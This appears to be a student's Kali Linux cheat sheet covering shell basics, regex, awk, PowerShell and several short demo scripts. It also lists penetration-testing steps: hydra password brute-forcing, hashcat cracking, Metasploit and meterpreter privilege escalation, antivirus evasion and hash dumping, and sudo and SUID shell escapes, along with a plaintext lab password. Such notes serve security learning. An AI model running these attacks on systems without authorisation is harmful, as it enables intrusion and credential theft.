~ = /home/kali (the user's home directory, a separate directory from /)
/ = root of the filesystem
User: kali Pass: ejgfb5
Linux cmds
Ctrl+Shift+'+' *Increase the font size
Left Ctrl+L or clear *Clear the screen
Right Ctrl+F *Toggle (undo) full screen
git clone “https path” *Download from GitHub
sudo ./filepath *Run the executable files or scripts
apt-get update *Refresh the package index (installs nothing by itself); apt-get upgrade *Upgrade installed packages; apt-get install <pkg> *Install a program
whoami * Current username
display * Display images (install imagemagick)
Dirbuster *Brute-force directories and files on a web server from a wordlist
cd /usr/share/wordlists; hydra -l test -P [Link] rdp://<ip address> *Brute-force the RDP password of user test with a wordlist
xdg-open file *Open image from the terminal
ls *List files; ls <dir> *List the content of a directory
date *Show date and time; exit *Close the terminal
pwd *Print working directory (the directory you are in)
ip addr *Show IP addresses
cd .. *Go up to the parent directory
cd *Go to the home directory
Tab *Command and path completion
nl *Number lines
touch <file> *Create an empty file; mkdir <dir> *Make a directory
rmdir <dir> *Remove an empty directory
ls -la *Long list of everything (names starting with "." are hidden files that plain ls does not show)
man ls *Read the manual of a command; ls --help *Short option summary
ssh username@yourIP -p 2222 *Remote shell over SSH on port 2222
echo Hi > [Link] *Writes 'Hi' into the file, replacing its content (quotes not needed for a single word)
>> *Appends; unlike a single > it does not replace the existing content
rm <file> *Remove a file; rm -r <dir> *Remove a directory together with its content
cp <file> <dest> *Copy a file (destination comes last)
cp -r <source_dir> <dest_dir> *Copy a directory with everything inside it
cat file1 >> file2 *Append file1 to file2 without overwriting it
mv *Move or rename a file or directory
Ex: mv old_name new_name
Up arrow * Previous cmds
passwd *Change your own password
sudo passwd user1 *Change another user's password
ls options:
-1 *One entry per line
-r *Reverse order
-l *Long list (permissions, owner, size, modification time; -l -h prints sizes in human-readable units)
-d *Show the directory entry itself instead of its content
-S *Sort by size (lower-case -s shows the allocated block count instead)
-p *Append / to directory names (for mkdir, -p creates missing parent directories)
cat <file> *Print a file (.txt etc.) Ex: cat dir8/[Link]
mousepad *GUI text editor, i.e. cat/nano in a window
tar -xvf archive.tar *Extract a .tar file (-x extract, -v verbose, -f file)
-r *Recursive Ex: cp -r copies the content inside the directory as well
&& *Run the 2nd command only if the 1st one succeeded
& *Run the command in the background if it takes long
unzip [Link] -d mydirec *Extract the zip into the mydirec directory
bzip2 <file> *Compress a single file to .bz2 (for a directory use tar -cjf dir.tar.bz2 dir)
find -name '*.txt' *Find files and dirs by name (put the name pattern in place of *; quote it so the shell does not expand it first)
grep "word" [Link] *Find a word inside a file (not a directory; grep -r searches directories)
Square brackets = RANGE or set of one character: m[a-d]m, m[asd]m (matches mam, msm, mdm)
Curly brackets = brace expansion: mkdir {folder1,folder2}
mkdir dir{1..100} *Create 100 directories
mkdir -p dir4/dir5 *-p creates the parent directory if it does not exist
rm -r dir{1..100} *Remove 100 directories
rmdir *Remove an empty directory (error if not empty)
rm -r *Remove a directory and everything inside it; mkdir dir1/FM *Create FM inside the existing dir1
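Added example (mine, not from these notes): brace expansion, glob ranges and the quoting pitfall with find -name, exercised inside a throwaway directory. The directory and file names are made up for the demo.

```shell
#!/usr/bin/env bash
# Added example: brace expansion, [a-c] globs and quoted vs unquoted find -name.
# Everything happens in a temporary directory with made-up names.
set -eu

WORK="$(mktemp -d)"
cd "$WORK"

# Brace expansion is done by the shell before mkdir runs: one command, 100 dirs.
mkdir dir{1..100}
mkdir -p dir4/dir5/dir6            # -p creates the missing parents in one go
touch notes.txt azz bzz czz mzz    # sample files for the glob patterns
touch dir7/inner.txt               # a .txt that is NOT in the current directory

# How many top-level dir* directories exist.
count_dirs() {
    ls -1d dir*/ 2>/dev/null | wc -l | tr -d ' '
}

# [a-c]zz expands to azz bzz czz; mzz is outside the range.
glob_range() {
    echo [a-c]zz
}

# Quoted pattern: find receives the literal *.txt and searches the whole tree.
find_txt_quoted() {
    find . -name '*.txt' | sort | tr '\n' ' '
}

# Unquoted pattern: the shell expands *.txt against the current directory first,
# so find is actually told -name notes.txt and never finds dir7/inner.txt.
find_txt_unquoted() {
    find . -name *.txt | sort | tr '\n' ' '
}

# Cleanup uses the same expansion in reverse.
remove_dirs() {
    rm -r dir{1..100}
}

echo "dirs: $(count_dirs)"
echo "[a-c]zz -> $(glob_range)"
echo "quoted:   $(find_txt_quoted)"
echo "unquoted: $(find_txt_unquoted)"
```

The unquoted form only "works" here because a single .txt file sits in the working directory; with two of them find aborts with "paths must precede expression", which is why the note above says to quote the pattern.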
sudo su -l *Switch to root with a login shell; sudo su -l name *Switch to user "name"
man ls; ls --help *Show the remaining options of a command
file <name> *Show the file type
su -l <user> *Switch user with a login shell (you do not stay in the old user's home directory)
/etc *System configuration files
/var *Frequently changing variable data: logs, caches, spool, backups
/tmp *Temporary directory; scratch space; cleared on restart
/etc/shadow *Hashed user passwords (readable by root only; these are hashes, not encrypted passwords)
/etc/passwd *Users and their login shells
/etc/group *Groups and their members
1) python3 -m http.server 8000 *Start a web server on a free port (serves the current directory)
2) wget [Link] -P /tmp/ *Download a file into /tmp, which is writable without sudo when you are not root
3) chmod +x [Link] *Make the script executable
wc -w *Word count; -l *Line count; -c *Byte count
nano <filename> *Edit a text file, or create it if it does not exist
Ctrl is shown as "^" inside the editor
Secure copy, local to remote (source to destination):
scp filename user@ip:/path/newname
Remote to local:
scp user@ip:/path/filename newname
kill <PID> *Kill a process by its PID
q *Quit a pager (less, man). PID 1 is the first process started at boot (init/systemd)
systemctl start|stop|enable|disable <servicename>
Ex: cmd & *Run it in the background; Ctrl+Z *Suspend the running foreground job (then bg lets it continue in the background), e.g. a long copy
fg *Bring the job back to the foreground
crontab -e *Edit schedule
/var/log *Logs; ufw.log for the firewall; fail2ban log for brute-force bans
Apache access and error logs are inside /var/log/apache2
less *Page through a file one screen at a time instead of dumping everything
add-apt-repository *Add an OS package repository (the repository lists live under /etc/apt)
wget -qO - <url> | sudo apt-key add - *Import the repository's signing key (apt-key is deprecated; current systems store the key under /etc/apt/keyrings and reference it with signed-by in the sources entry)
Create the sources file and add the repository line to it; then apt update; apt install <package>
[a-c]zz *azz, bzz, czz; [a-cx-z]zz *azz, bzz, czz, xzz, yzz, zzz
[a-zA-Z] *Any letter; file[1-3] *file1, file2, file3; [^k]ing *Any character except "k": ring, not king
[^a-c]at *NOT bat, cat; fat, hat are okay
[abc] *One single character that is a, b or c
. *Any single character: ".at" matches cat, fat, hat, rat
\ + char *Escape character. For a literal dot: a\.c matches only a.c
? *Optional (0 or 1 times): abc? matches ab or abc; the "c" is optional
* *Zero or more times: cats* matches cat, cats, catsss; a*f matches f, af, aaf
+ *One or more times: ab+c matches abc, abbc but not ac
grep -E 'e+' [Link] *Matches red, reef, reeed
\d *Digit \D *Non-digit (Perl syntax: works with grep -P; with grep -E use [0-9] or [[:digit:]])
\w *Word character: letters, digits, underscore \W *Non-word character: !, #
\s *Whitespace (space, tab, newline) \S *Non-whitespace
{12} *Exactly 12 times. {1,5} *1 to 5 times. {2,} *2 or more times
^ *Starts with (outside brackets; inside [^...] it means exclude) $ *Ends with
^abc *Starts with abc. xyz$ *Ends with xyz
^a.*r$ *Starts with "a", ends with "r"
^...$ *Exactly 3 characters
During the (day|night) *"During the day" or "During the night"
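Added example (not part of the original notes): the regex rules above run with grep -E against a small constructed sample file, so each claim about what matches can be checked instead of taken on faith. Only -E syntax is used (no \d), because GNU grep -E does not understand the Perl classes.

```shell
#!/usr/bin/env bash
# Added example: exercises the regex notes with grep -E over constructed lines.
# The sample file is made up; it only exists to make the patterns observable.
set -eu

SAMPLE_FILE="$(mktemp)"
cat > "$SAMPLE_FILE" <<'EOF'
cat
bat
fat
hat
king
ring
red
reef
reeed
abc
ab
a.c
axc
During the day
During the night
During the evening
user_1
EOF

# Number of sample lines matching an extended regex. Usage: count_matches 'regex'
# grep -c prints 0 and exits 1 on no match, so the || true keeps set -e quiet.
count_matches() {
    grep -Ec -- "$1" "$SAMPLE_FILE" || true
}

# The matching lines on one line, for eyeballing.
show_matches() {
    grep -E -- "$1" "$SAMPLE_FILE" | tr '\n' ' '
}

# Walk through the notes: anchors, classes, quantifiers, alternation.
for re in '^[^k]ing$' '^[^a-c]at$' '^.at$' '^a\.c$' '^a.c$' \
          '^abc?$' '^re+d$' 'e{2,}' '^...$' 'During the (day|night)' '[[:digit:]]'; do
    printf '%-24s %s-> %s\n' "$re" "$(count_matches "$re")" "$(show_matches "$re")"
done
```

Note the difference between '^a\.c$' (literal dot, one hit) and '^a.c$' (any character, three hits): the same pattern typed without single quotes would have its backslash eaten by the shell first.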
updatedb *Rebuild the locate database when a new file does not show up
chmod +rwx <file> *Add read, write and execute permission on the file
chmod 777 <file> *Full permission for everybody (owner, group, others); world-writable files are a classic privilege-escalation finding, so do not leave this on your own files
sudo useradd -g blue -G purple -s /bin/bash ME *Create user ME with primary group blue, extra group purple and bash as login shell
sudo adduser <name> (useradd, addgroup) *Add a user (adduser is the interactive front end to useradd)
sudo userdel john *Delete a user
grep 'sudo' /etc/group *See the members of the "sudo" group, i.e. who can use sudo
du -ah /home/ *Disk usage with sizes (-a all files, -h human-readable)
du -c *Grand total of the folders; du --time *Last modification time
egrep = grep -E *Extended regex (alternation |, +, ?, {}); grep -e pat1 -e pat2 *Give several patterns
grep -F = fgrep *Search for the fixed string, not a regex
grep *Basic regex; egrep *Extended regex
grep -v *Lines NOT containing the pattern. -R *Recursive into directories
grep -i *Search while IGNORING the CASE
tr -s (translate; squeeze) *REPLACE the source CHARACTER SET (not words) with the destination set and squeeze repeated characters.
Ex: cat [Link] | tr -s '[a-z]' '[A-Z]' *Lower-case letters become upper-case. tr -s ' ' *Squeeze runs of spaces into one
tr -d 'set' *Delete the characters of the set
tr -d 'chars' < [Link] > [Link] *Delete the characters and write the result to a new file
[:digit:] *Select digits
[a-zA-Z] *Select all letters
awk '{print}' <file> = cat; awk '/ctf/' [Link] *Print the lines containing "ctf"
awk '{print $1,$3}' [Link] *Print the 1st and 3rd field of each line
awk '{print NR,$0}' [Link] *Number the lines (NR = record number)
$0 = the whole line. Fields are the pieces between the field separators (whitespace by default)
awk 'BEGIN{FS="o"} {print $1,$3} END{print "TOTAL ROWS= " NR}' [Link] *Use the letter "o" as field
separator, print fields 1 and 3 of every line, and print the total row count at the end
sort *Sort alphabetically; sort -n -r *Numerically, reversed (largest number first)
sort -o [Link] *Write the sorted result to an output file
uniq *Drop duplicate lines, but only adjacent ones (distant duplicates stay)
sort | uniq *Sort first so all duplicates become neighbours, then drop them
uniq -c *Count the occurrences of each line
uniq -d *Show only the repeated lines; uniq -u *Show only the lines that occur once
head -n 2271 [Link] *Show the first 2271 lines (line 2271 is the last one printed)
cut -d ":" -f 1 *Delimiter is the colon; take the first field (e.g. usernames from /etc/passwd for brute force)
cat -n *Number the lines
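Added example (not from the notes): the cut/awk/sort/uniq pipelines above, plus the /var/log/apache2 access-log idea, applied to constructed /etc/passwd and Apache lines. Users, IPs, paths and timestamps are made up; the functions wrap the pipelines so their results can be checked.

```shell
#!/usr/bin/env bash
# Added example: cut, awk, sort | uniq -c and tr -s on constructed sample data.
# Neither file below is real system data.
set -eu

# Constructed /etc/passwd-style lines (hypothetical accounts).
PASSWD_SAMPLE="$(mktemp)"
cat > "$PASSWD_SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/zsh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
EOF

# Constructed Apache access-log lines (hypothetical client IPs and paths).
ACCESS_SAMPLE="$(mktemp)"
cat > "$ACCESS_SAMPLE" <<'EOF'
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 1043
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /admin HTTP/1.1" 404 209
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /backup HTTP/1.1" 404 209
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /.git/HEAD HTTP/1.1" 404 209
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /login HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /config.php HTTP/1.1" 403 199
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "POST /login HTTP/1.1" 302 0
EOF

# Usernames with a real login shell (field 1, filtered on field 7):
# a sensible user list for hydra instead of brute-forcing nologin accounts.
login_users() {
    grep -v -E ':(/usr/sbin/nologin|/bin/false)$' "$PASSWD_SAMPLE" | cut -d ':' -f 1
}

# Accounts per shell: sort first so uniq -c sees duplicates next to each other.
shells_histogram() {
    awk -F ':' '{print $7}' "$PASSWD_SAMPLE" | sort | uniq -c | sort -rn
}

# Client IPs ranked by number of 4xx responses (field 9 is the status code):
# a crude detector for directory brute-forcing tools like gobuster/dirbuster.
top_4xx_ips() {
    awk '$9 ~ /^4/ {print $1}' "$ACCESS_SAMPLE" | sort | uniq -c | sort -rn
}

# Distinct paths requested by one IP; tr -s squeezes repeated spaces before cut.
distinct_paths_for() {
    grep -F "$1 " "$ACCESS_SAMPLE" | tr -s ' ' | cut -d ' ' -f 7 | sort -u | wc -l | tr -d ' '
}

echo "Login-capable users:"; login_users
echo "Accounts per shell:"; shells_histogram
echo "4xx responses per client:"; top_4xx_ips
echo "Distinct paths for 10.0.0.9: $(distinct_paths_for 10.0.0.9)"
```

The awk field numbers depend on the combined log format shown in the sample; on a host with a custom LogFormat, check the column positions with awk '{print NF, $9}' before trusting the count.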
env *Show the environment variables, including PATH (may reveal an available scripting language)
ifconfig *Show network interfaces, IPs etc.
netstat -at / -au *List TCP / UDP connections; netstat -s *Statistics (ss is the modern replacement)
pdfinfo [Link] *Get info about a PDF (author, creation time etc.)
sudo apt install poppler-utils *Install the command above on Kali
exiftool [Link] *GPS position, camera model etc. (replace "deg" with "°" and paste the coordinates into Google or Bing Maps)
sudo apt install libimage-exiftool-perl *Install the command above
ftp <ip address> *Connect to an open FTP port
get <file> [new name] *Download a file from the FTP server
sha256sum <file> *Compute the SHA-256 hash of a file
md5sum <file> *Compute the MD5 hash
echo "code" | base64 -d *Decode base64
sudo su *Become root
find / -iname "filename" 2>/dev/null *Search for the file from / ignoring case; errors from unreadable directories go to /dev/null. No path needed
find . -name [Link] *Find the file in the current directory tree
find / -type f -perm 0777 *Find files with exactly 777 permissions (-type d *directories)
find / -size +100M *Find files larger than 100 MB
cat /etc/issue *Distribution and version; cat /proc/version *Kernel version of the target system
netdiscover -r <range> *Find live IP addresses on the LAN via ARP
hashcat -O -m 20 --show <hashfile> /usr/share/wordlists/[Link] *-O optimized kernels, -m the hash mode
number (check hashcat --help; 20 is md5($salt.$pass)), --show prints the already cracked passwords from the potfile
gobuster dir -u http://10.10.. -w <wordlist path> *Brute-force directories on a web server
hydra -l username -P <wordlist path> -t 6 10.10.x.x ssh (or -L [Link] for a user list) *Brute-force the SSH password
hydra -l username -P [Link] [Link] (host, no trailing slash) http-post-form
"/login:user=^USER^&pass=^PASS^:invalid" *Use hydra against login pages: form path, POST body with ^USER^ and ^PASS^ placeholders, and a string that appears on a failed login
crunch 7 9 abc6543 *Make a wordlist with words from 7 to 9 characters long built from the given characters
Nmap
nmap -F -A -sN -T4 -sC <ip address> *-F fast scan of the 100 most common ports, -A aggressive (version detection -sV, default scripts -sC, OS detection, traceroute), -T4 faster timing. Note: -sN is a TCP NULL scan, not "scan the network", and -sC is already included in -A
nmap -sV -vv -sC --script vuln -sS <ip> *Version scan, very verbose, default scripts plus the vuln script category, SYN scan (-sS is half-open, needs root, and is not really stealthy against a modern IDS)
If port 80 (http) or 443 (https) is open there is a web server, mostly hosting websites under different /paths
Check the versions of the web applications running under those paths
Searchsploit (offline copy of Exploit-DB)
searchsploit --cve 2019-9053 *Search Exploit-DB for an exploit (example CVE)
searchsploit -m <exploit path> *Mirror (copy) the exploit to your machine
python3 /usr/share/exploitdb/exploits/<path shown by searchsploit> [Link] *Run the exploit against the target
Metasploit (after nmap and gobuster)
msfconsole *Start Metasploit
search <name> *Search for the service or vulnerability found with nmap
use <number> *Select the exploit
back *Leave the module if you picked the wrong one
show options *See which options are required
set RHOSTS <ip> *Set the required values
Ctrl+Z or background *Background the session
search shell_to_meterpreter, then use 0 and show options *Upgrade a plain shell to a meterpreter session
set SESSION <id> (sessions *list the sessions) then run
sessions -i <id> *Interact with the new meterpreter session
Meterpreter: 1) getsystem *Try to escalate to SYSTEM; getuid afterwards confirms whether it worked 2) shell *Open an OS shell (Windows cmd or whatever the target runs; shows the file path) 3) whoami 4) (after Ctrl+Z or background) ps *List processes 5) migrate <PID> *Migrate into an NT AUTHORITY\SYSTEM process (e.g. [Link]) to keep the session stable and evade antivirus 6) hashdump *Dump the Windows password hashes from the SAM (migrate into another SYSTEM process if it fails)
Other meterpreter commands: search -f <file> *Find a file (when pasting a Windows path use double backslashes \\ or Tab completion instead of typing it by hand); ? *Help; dir *List a directory on Windows; type = more = cat *Show file content; getuid *Current user and privileges; sessions -i <id> *Go back to a session; cat "path\to\file" *Quote Windows paths on Linux; sysinfo *Computer and OS name; pwd; cd ../../
Privilege Escalation
Use linux-exploit-suggester
sudo vim -c ':!/bin/sh' *If vim can be run as root through sudo, spawn a shell from it; inside vim press Esc for normal mode
and type :!cmd to execute commands
sudo -l *See what you are allowed to run with sudo; also look at the other users' home directories
Go to GTFOBins ([Link]) and look up the binaries from sudo -l that can be abused to escalate
find / -perm -4000 2>/dev/null *Find files with the SUID bit set; 2>/dev/null discards the permission errors
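Added example (not from the notes): the find -perm -4000 2>/dev/null SUID hunt from the section above, run against a constructed directory tree so it works without root and can be checked. The list of "dangerous" binary names is a short assumption for the demo; the real reference is the GTFOBins page the notes point to.

```shell
#!/usr/bin/env bash
# Added example: SUID and 777 hunting with find, on a fake filesystem built in
# a temporary directory. Names and permissions below are constructed for the demo.
set -eu

LAB="$(mktemp -d)"
mkdir -p "$LAB/usr/bin" "$LAB/usr/sbin" "$LAB/opt/app"
for f in usr/bin/passwd usr/bin/vim usr/bin/find usr/bin/ls opt/app/backup usr/sbin/helper; do
    : > "$LAB/$f"
done
chmod 4755 "$LAB/usr/bin/passwd"   # expected: passwd is legitimately SUID
chmod 4755 "$LAB/usr/bin/vim"      # suspicious: an editor that can spawn a shell
chmod 4755 "$LAB/usr/bin/find"     # suspicious: find -exec runs arbitrary commands
chmod 0777 "$LAB/opt/app/backup"   # world-writable, but not SUID
chmod 0755 "$LAB/usr/bin/ls" "$LAB/usr/sbin/helper"

# Files with the SUID bit. -perm -4000 means "at least these bits", so files
# like 4755 match; errors from unreadable directories are thrown away.
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# -perm 0777 without the dash is an exact match: precisely rwxrwxrwx.
find_777() {
    find "$1" -type f -perm 0777 2>/dev/null | sort
}

# Cross the SUID list with a sample of binaries known to give a root shell when
# SUID (assumption: a few names only; check GTFOBins for the real catalogue).
SUSPECT_SUID_NAMES="vim find bash nmap python"
flag_dangerous_suid() {
    find_suid "$1" | while read -r path; do
        name="$(basename "$path")"
        case " $SUSPECT_SUID_NAMES " in
            *" $name "*) printf '%s\n' "$path" ;;
        esac
    done
}

echo "SUID files:"; find_suid "$LAB"
echo "Exactly 777:"; find_777 "$LAB"
echo "SUID binaries worth a GTFOBins lookup:"; flag_dangerous_suid "$LAB"
```

On a real target replace "$LAB" with /; the 2>/dev/null is what keeps the output readable, because most of /proc and other users' home directories will refuse the traversal.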
Enumeration:
hostname *Name of the machine (often hints at the OS or role)
uname -a *Info about the kernel
ps -axjf *View the process tree
ps aux *All users' processes and who launched them
ps aux | grep -v tty *Hide the processes attached to a terminal, in other words show the background
processes
id [name] *Show your own or another user's uid and groups; also tells you whether you are root (uid 0)
history *See the command history
gedit [Link] *Edit Snort rules
sudo snort options:
-X *Dump the raw packet data as hex + ASCII (similar to -dev; combine with -r or -c)
-d *Dump the application-layer data (logger mode: output all packets)
-A full *Generate full alerts
-c *Specify the config/rules file
-r *Read a pcap or snort log file
-T *Test the config and rules (together with -c)
-l . *Write the output to the current directory
IPS mode: sudo snort -c <file> -q -Q --daq afpacket -i eth0:eth1 -A full
sudo snort -r [Link] 'port 22' *BPF filter: only port 22 traffic from the capture
/etc/snort/rules/[Link] *Where the rule files live
tail / head <file> *Show the last / first 10 lines of the file
route = ip r *Show the routing table (the /prefix tells you which subnet you share with other hosts)
ip a *Show your IP addresses on the network
iwconfig *See the wireless interfaces
service apache2 start *Start the Apache web server
Bettercap:
1st cmd: bettercap
net.probe on *Discover devices on the network; net.show *List the discovered devices
CMD:
ipconfig /? *Help for a command
cls *Clear the screen
net user [username] *List users; with a name, show that user's groups and last logon
color 2 (3, 4...) *Change the console colour; dir /s *List recursively
arp -a *IP-to-MAC table of the hosts seen on the local network
PowerShell: (Verb-Noun)
cd C:\
Get-Command; Get-Alias *See the cmdlets and their aliases
Get-Command Verb-* or Get-Command *-Noun *Wildcard search for cmdlets
Get-Help <command-name> *Get help
Get-Service | Where-Object -Property Status -eq Stopped *Services whose status is Stopped
ls -Path C:\ -Include *[Link]* -File -Recurse -ErrorAction SilentlyContinue *Find files (not directories) by name, ignoring access errors
Get-Content "C:\..." *cat a file
Get-FileHash -Algorithm MD5 <filepath> *Hash a file
Get-ChildItem | Select-Object -Property Mode,Name
Set-Location C:\ = cd \ *Go to the root of the C: drive
Get-ChildItem = dir = ls *List
Set-Location = cd *Change directory
Get-Location = pwd *Show the current directory
Copy-Item = cp
New-Item [Link] *Create a file
echo "smth" *Print text (Write-Output)
Remove-Item = rm = rmdir = del = rd
Clear-Host = clear = cls *Clear the screen
notepad, calc (calculator), mspaint
ipconfig /all *Full network configuration
Get-Help *resolve* *Find help topics and cmdlets matching a wildcard